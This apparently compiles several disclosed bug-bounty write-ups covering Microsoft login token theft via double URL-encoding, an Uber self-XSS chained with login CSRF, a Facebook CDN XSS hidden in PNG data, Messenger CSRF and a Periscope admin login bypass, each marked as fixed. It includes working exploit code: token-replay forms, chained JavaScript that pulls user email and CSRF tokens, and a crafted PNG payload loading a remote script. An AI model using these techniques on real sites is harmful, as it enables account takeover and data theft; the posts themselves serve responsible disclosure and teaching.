This is pretty similar to Wes’s awesome OAuth CSRF in Live, except it’s in the main Microsoft authentication system rather than the OAuth approval prompt.

Microsoft, being a huge company, have various services spread across multiple domains (*, *, and so on).

To handle authentication across these services, requests are made to,, and to get a session for the user.

The flow for is as follows:

        <noscript>JavaScript required to sign in</noscript>
        <script type="text/javascript">
            function OnBack(){}function DoSubmit(){var subt=false;if(!subt){subt=true;document.fmHF.submit();}}
    <body onload="javascript:DoSubmit();">
        <form name="fmHF" id="fmHF" action="" method="post" target="_self">
            <input type="hidden" name="t" id="t" value="EgABAgMAAAAEgAAAA...">
  • The service then consumes the token, and logs the user in.

Since the services are hosted on completely separate domains, and therefore cookies can’t be used, the token is the only value needed to authenticate as a user. This is similar-ish to how OAuth works.

What this means is that if we can get the above code to POST the value of t to a server we control, we can impersonate the user.

As expected, if we try and change the value of wreply to a non-Microsoft domain, such as, we receive an error, and the request isn’t processed:

Fun with URL-Encoding and URL Parsing

One fun trick to play around with is URL-encoding parameters multiple times. Occasionally this can be used to bypass different filters, which is the root cause of the bug.

In this case, wreply is URL-decoded before the domain is checked. Therefore becomes, which is valid, and the request goes through.

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

What’s interesting is that when passing a value of an error is thrown, since isn’t a valid URL.

However, appending doesn’t generate an error. Instead, it gives us the following, which is a valid URL:

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

If you’re wondering why this is valid, it’s because the syntax of a URL is as follows:


From this you can tell that the server is doing two checks:

  • The first is a sanity check on the URL, to ensure it’s valid, which it is, since is the username part of the URL.

  • The second is to determine if the domain is allowed. This second check should fail - is not allowed.

It’s clear that server is decoding wreply n times until there are no longer any encoded characters, and then validating the domain. This sort of inconsistency is something I’m quite familiar with.

Now that we can specify an arbitrary URL to POST the token, the rest is trivial. We set the redirect to, which results in:

<form name="fmHF" id="fmHF" action="" method="post" target="_self">

This causes the token to be sent to our site:

Then we simply replay the token ourselves:

<form action="" method="post">
    <input name="t" value="EgABAgMAAAAEgAAAAwAB...">
    <input type="submit">

Which then gives us complete access to the user’s account:

Note: The token is only valid for the service which issued it - an Outlook token can’t be used for Azure, for example. But it’d be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way.

This was quite a fun CSRF to find and exploit. Despite CSRF bugs not having the same credibility as other bugs, when discovered in authentication systems their impact can be pretty large.


The hostname in wreply now must end in %2f, which gets URL-decoded to /.

This ensures that the browser only sends the request to the intended host.


  • Sunday, 24th January 2016 - Issue Reported
  • Sunday, 24th January 2016 - Issue Confirmed & Triaged
  • Tuesday, 26th January 2016 - Issue Patched

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts.

On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of the profile fields to

causes the code to be executed, and an alert box popped.

This took all of two minutes to find after signing up, but now comes the fun bit.


Being able to execute additional, arbitrary JavaScript under the context of another site is called Cross-Site Scripting (which I’m assuming 99% of my readers know). Normally you would want to do this against other users in order to yank session cookies, submit XHR requests, and so on.

If you can’t do this against another user - for example, the code only executes against your account, then this is known as a self-XSS.

In this case, it would seem that’s what we’ve found. The address section of your profile is only shown to you (the exception may be if an internal Uber tool also displays the address, but that’s another matter), and we can’t update another user’s address to force it to be executed against them.

I’m always hesitant to send in bugs which have potential (an XSS in this site would be cool), so let’s try and find a way of removing the “self” part from the bug.

Uber OAuth Login Flow

The OAuth that flow Uber uses is pretty typical:

  • User visits an Uber site which requires login, e.g.
  • User is redirected to the authorisation server,
  • User enters their credentials
  • User is redirected back to
    with a code, which can then be exchanged for an access token

In case you haven’t spotted from the above screenshot, the OAuth callback,

, doesn’t use the recommended
parameter. This introduces a CSRF vulnerability in the login function, which may or may-not be considered an important issue.

In addition, there is a CSRF vulnerability in the logout function, which really isn’t considered an issue. Browsing to

destroys the user’s
session, and performs a redirect to the same logout function on

Since our payload is only available inside our account, we want to log the user into our account, which in turn will execute the payload. However, logging them into our account destroys their session, which destroys a lot of the value of the bug (it’s no longer possible to perform actions on their account). So let’s chain these three minor issues (self-XSS and two CSRF’s) together.

For more info on OAuth security, check out @homakov’s awesome guide.

Chaining Minor Bugs

Our plan has three parts to it:

  • First, log the user out of their
    session, but not their
    session. This ensures that we can log them back into their account
  • Second, log the user into our account, so that our payload will be executed
  • Finally, log them back into their account, whilst our code is still running, so that we can access their details

Step 1. Logging Out of Only One Domain

We first want to issue a request to

, so that we can then log them into our account. The problem is that issuing a requets to this end-point results in a 302 redirect to
, which destroys the session. We can’t intercept each redirect and drop the request, since the browser follows these implicitly.

However, one trick we can do is to use Content Security Policy to define which sources are allowed to be loaded (I hope you can see the irony in using a feature designed to help mitigate XSS in this context).

We’ll set our policy to only allow requests to

, which will block

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Logout of -->
<img src="">

This works, as indicated by the CSP violation error message:

Step 2. Logging Into Our Account

This one is relatively simple. We issue a request to

to initiate a login (this is needed else the application won’t accept the callback). Using the CSP trick we prevent the flow being completed, then we feed in our own
(which can be obtained by logging into our own account), which logs them in to our account.

Since a CSP violation triggers the

event handler, this will be used to jump to the next step.

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Logout of -->
<img src="" onerror="login();">
    //Initiate login so that we can redirect them
    var login = function() {
        var loginImg = document.createElement('img');
        loginImg.src = '';
        loginImg.onerror = redir;
    //Redirect them to login with our code
    var redir = function() {
        //Get the code from the URL to make it easy for testing
        var code = window.location.hash.slice(1);
        var loginImg2 = document.createElement('img');
        loginImg2.src = '' + code;
        loginImg2.onerror = function() {
            //Redirect to the profile page with the payload
            window.location = '';

Step 3. Switching Back to Their Account

This part is the code that will be contained as the XSS payload, stored in our account.

As soon as this payload is executed, we can switch back to their account. This must be in an iframe - we need to be able to continue running our code.

//Create the iframe to log the user out of our account and back into theirs
var loginIframe = document.createElement('iframe');
loginIframe.setAttribute('src', '');

The contents of the iframe uses the CSP trick again:

<!-- Set content security policy to block requests to, so the target maintains their session -->
<meta http-equiv="Content-Security-Policy" content="img-src">
<!-- Log the user out of our partner account -->
<img src="" onerror="redir();">
    //Log them into partners via their session on
    var redir = function() {
        window.location = '';

The final piece is to create another iframe, so we can grab some of their data.

//Wait a few seconds, then load the profile page, which is now *their* profile
setTimeout(function() {
    var profileIframe = document.createElement('iframe');
    profileIframe.setAttribute('src', '');
    profileIframe.setAttribute('id', 'pi');
    //Extract their email as PoC
    profileIframe.onload = function() {
        var d = document.getElementById('pi').contentWindow.document.body.innerHTML;
        var matches = /value="([^"]+)" name="email"/.exec(d);
}, 9000);

Since our final iframe is loaded from the same origin as the Profile page containing our JS, and

is set to
, we can access the content inside of it (using

Putting It All Together

After combining all the steps, we have the following attack flow:

  • Add the payload from step 3 to our profile
  • Login to our account, but cancel the callback and make note of the unused
  • Get the user to visit the file we created from step 2 - this is similar to how you would execute a reflected-XSS against someone
  • The user will then be logged out, and logged into our account
  • The payload from step 3 will be executed
  • In a hidden iframe, they’ll be logged out of our account
  • In another hidden iframe, they’ll be logged into their account
  • We now have an iframe, in the same origin containing the user’s session

This was a fun bug, and proves that it’s worth persevering to show a bug can have a higher impact than originally thought.

Content uploaded to Facebook is stored on their CDN, which is served via various domains (most of which are sub-domains of either or

The captioning feature of Videos also stores the .srt files on the CDN, and I noticed that right-angle brackets were un-encoded.….srt

I was trying to think of ways to get the file interpreted as HTML. Maybe MIME sniffing (since there’s no X-Content-Type-Option header)?

It’s actually a bit easier than that. We can just change the extension to .html (which probably shouldn’t be possible…).….html

Unfortunately left angles are stripped out (which I later found out was due to @phwd’s very much related finding), so there’s not much we can do here. Instead, I looked for other files which could also be loaded as text/html.

A lot of the photos/videos on Facebook now seem to contain a hash in the URL (parameters oh and __gda__), which causes an error to be thrown if we modify the file extension.

Luckily, advert images don’t contain these parameters.

All that we have to do now is find a way to embed some HTML into an image. The trouble is that Exif data is stripped out of JPEGs, and iTXt chunks are stripped out of PNGs.

If we try to blindly insert a string into an image and upload it we receive an error.


I started searching for ideas and came across this great blog post: “Encoding Web Shells in PNG IDAT chunks”. This section of this bug is made possible due that post, so props to the author.

The post describes encoding data into the IDAT chunk, which ensures it’ll stay there even after the modifications Facebook’s image uploader makes.

The author kindly provides a proof-of-concept image, which worked perfectly (the PHP shell obviously won’t execute, but it demonstrates that the data survived uploading).

Now, I could have submitted the bug there and then - we’ve got proof that images can be served with a content type of text/html, and angle brackets aren’t encoded (which means we can certainly inject HTML).

But that’s boring, and everyone knows an XSS isn’t an XSS without an alert box.

The author also provides an XSS ready PNG, which I could just upload and be done. But since it references a remote JS file, I wasn’t too keen on the bug showing up in a referer log. Plus I wanted to try myself to create one of these images.

As mentioned in post, the first step is to craft a string, that when compressed using DEFLATE, produces the desired output. Which in this case is:

<SCRIPT src=//FNT.PE><script>

Rather than trying to create this by hand, I used a brute-force solution (I’m sure there are much better ways, but I wanted to whip up a script and leave it running):

  • Convert the desired output to hex - 3c534352495054205352433d2f2f464e542e50453e3c2f7363726970743e
  • Prepend 0x00 -> 0xff to the string (one to two times)
  • Append 0x00 -> 0xff to the string (one to two times)
  • Attempt to uncompress the string until an error isn’t thrown
  • Check that the result contains our expected string

The script took a while to run, but it produced the following output:


Compressing the above confirms that we get our string back:

fin1te@mbp /tmp » php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"
??<SCRIPT SRC=//FNT.PE></script>

Combining the result, with the PHP code for reversing PNG filters and generating the image, gives us the following:

Which, when dumped, shows our payload:

fin1te@mbp /tmp » hexdump -C xss-fnt-pe-png.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 65 49 44 41 54 48 89  |...+.....eIDATH.|
00000040  63 ac ff 3c 53 43 52 49  50 54 20 53 52 43 3d 2f  |c..<SCRIPT SRC=/|
00000050  2f 46 4e 54 2e 50 45 3e  3c 2f 73 63 72 69 70 74  |/FNT.PE></script|
00000060  3e c3 ea c0 46 8d 17 f3  af de 3d 73 d3 fd 15 cb  |>...F.....=s....|
00000070  43 2f 0f b5 ab a7 af ca  7e 7d 2d ea e2 90 22 ae  |C/......~}-...".|
00000080  73 85 45 60 7a 90 d1 8c  3f 0c a3 60 14 8c 82 51  |s.E`z...?..`...Q|
00000090  30 0a 46 c1 28 18 05 a3  60 14 8c 82 61 00 00 78  |0.F.(...`...a..x|
000000a0  32 1c 02 78 65 1f 48 00  00 00 00 49 45 4e 44 ae  |2..xe.H....IEND.|
000000b0  42 60 82                                          |B`.|

We can then upload it to our advertiser library, and browse to it (with an extension of .html).

What can you do with an XSS on a CDN domain? Not a lot.

All I could come up with is a LinkShim bypass. LinkShim is script/tool which all external links on Facebook are forced through. This then checks for malicious content.

CDN URL’s however aren’t Link Shim’d, so we can use this as a bypass.

Moving from the Akamai CDN hostname to *

Redirects are pretty boring. So I thought I’d check to see if any * DNS entries were pointing to the CDN.

I found (I forgot to screenshot the output of dig before the patch, so here’s an entry from Google’s cache):

Browsing to this host with our image as the path loads a JavaScript file from, which then displays an alert box with the hostname.

Any session cookies are marked as HTTPOnly, and we can’t make requests to What do we do other than popping an alert box?

Enter document.domain

It’s possible for two pages from a different origin, but sharing the same parent domain, to interact with each other, providing they both set the document.domain property to the parent domain.

We can easily do this for our page, since we can run arbitrary JavaScript. But we also need to find a page on which does the same, and doesn’t have an X-Frame-Options header set to DENY or SAMEORIGIN (we’re still cross-origin at this point).

This wasn’t too difficult to find - Facebook has various plugins which are meant to be placed inside an <iframe>.

We can use the Page Plugin. It sets the document.domain property, and also contains fb_dtsg (the CSRF token Facebook uses).

What we now need to do is load the plugin inside an iframe, wait for the onload event to fire, and extract the token from the content.

document.domain = '';

var i = document.createElement('iframe');
i.setAttribute('id', 'i');
i.setAttribute('style', 'visibility:hidden;width:0px;height:0px;');
i.setAttribute('src', '');

i.onload = function(){
    alert(document.domain + "\nfb_dtsg: " + i.contentWindow.document.getElementsByName('fb_dtsg')[0].value);


Notice how the alert box now shows, not

We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).

It’s also possible to issue XHR requests via the iframe to extract data from (rather than blindly post data with the token).

So it turns out an XSS on the CDN can do pretty much everything that one on the main site can.


Facebook quickly hot-fixed the issue by removing the forward DNS entry for

Whilst the content type issue still exists, it’s a lot less severe since the files are hosted on a sandboxed domain.

Bonus ASCII Art

One easter-egg I found was that if you append .txt or .html to the URL (rather than replace the file extension), you get a cool ASCII art version of the image. This also works for images on Instagram (since they share the same CDN).

Try it out yourself:

I originally wasn’t going to publish this, but @phwd wanted to hear about some of my recent bugs so this post is dedicated to him.

This issue was also found by @mazen160, who blogged about it back in June.

When launched back in April, I quickly had a look for any low-hanging fruit.

One of the first things to do is check end-points for Cross-Site Request Forgery issues. This is whereby an attacker can abuse the fact that cookies are implicity sent with a request (regardless of where the request is made from), and perform actions on another users behalf, such as sending a message or updating a status.

There are different ways of mitigating this (with varying results), but usually this is achieved by sending a non-guessable token with each request, and comparing it to a value stored server-side/decrypting it and verifying the contents.

The way I normally check for these is as follows:

  1. Perform the request without modifying the parameters, so we can see what the expected result is
  2. Remove the CSRF token completely (in this case, the fb_dtsg parameter)
  3. Modify one of the characters in the token (but keep the length the same)
  4. Remove the value of the token (but leave the parameter in place)
  5. Convert to a GET request

If any of the above steps produce the same result as #1 then we know that the end-point is likely to be vulnerable (there are some instances where you might get a successful response, but in fact no data has been modified and therefore the token hasn’t been checked).

Normally, on Faceboook, the response is one of two, depending on if the request is an AJAX request or not (indicated by the __a parameter).

Either a redirect to /common/invalid_request.php:

Or an error message:

I submitted the following request to change the sound_enabled setting, without fb_dtsg:

POST /settings/edit/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded


Which surprisingly gave me the following response:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3559

for (;;);{"__ar":1,"payload":[],"jsmods":{"instances":[["m_a_0",["MarketingLogger"],[null,{"is_mobile":false,"controller_name":"XMessengerDotComSettingsEditController"

I tried another end-point, this time to remove a user from a group thread.

POST /chat/remove_participants/?uid=100...&tid=153... HTTP/1.1
Content-Type: application/x-www-form-urlencoded


Which also worked:

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 136

for (;;);{"__ar":1,"payload":null,"domops":[["replace","^.fbProfileBrowserListItem",true,null]],"bootloadable":{},"ixData":{},"lid":"0"}

After trying one more I realised that the check was missing on every request.


Simple and quick fix - tokens are now properly checked on every request.

I haven’t blogged for quite some time, so I thought it was worth re-launching with an interesting, albeit simple, high-impact bug.

Periscope is an iOS/Android app, owned by Twitter, used for live streaming. To manage the millions of users, a web-based administation panel is used, accessible at

When you browse to the site, all requests are redirected to /auth?redirect=/ (since we don’t have a valid session), which in turn redirects to Google for authentication.

The redirected URL, shown below, contains various parameters, but the most interesting one is hd. This is used to restrict logins to a specific domain, in this case

If we try and login with an account such as, we’re redirected back to the account selection page, and if we try again we get redirected back to the same place, and so on.

However, we can simply remove this parameter. There’s no signature in the URL to prevent us from making modifications, and as indicated in the documentation, the onus is on the application to validate the returned token.

This gives us the following login URL (you may also notice I’ve removed the Google+ scope, this is purely because my test account isn’t signed up for it):

Browsing to this new URL prompts us to authorise the application.

After clicking “Accept”, a redirect is issused back to the administation panel, with our code as a parameter.

This is where the application should then exchange the code for an access token, and validate the returned user ID against either a whitelist, or at the very least verify that the domain is

But, in this case, the assumption is made that if you managed to login, you are an employee with an email.

The requested userinfo.profile permission doesn’t contain the user’s email address, so the application can’t validate it if it tried.

This then presents us with the admin panel.

From here we can now manage various aspects of Periscope, including users and streams.


Twitter fixed this by making two changes. The first is to request an additional permission:

The second is to correctly validate the user on callback.

Now, the application returns a 401 when trying to authenticate with an invalid user:

HTTP/1.1 401 Unauthorized
Content-Type: text/html; charset=utf-8
Location: /Login
Strict-Transport-Security: max-age=31536000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Xss-Protection: 1; mode=block
Content-Length: 36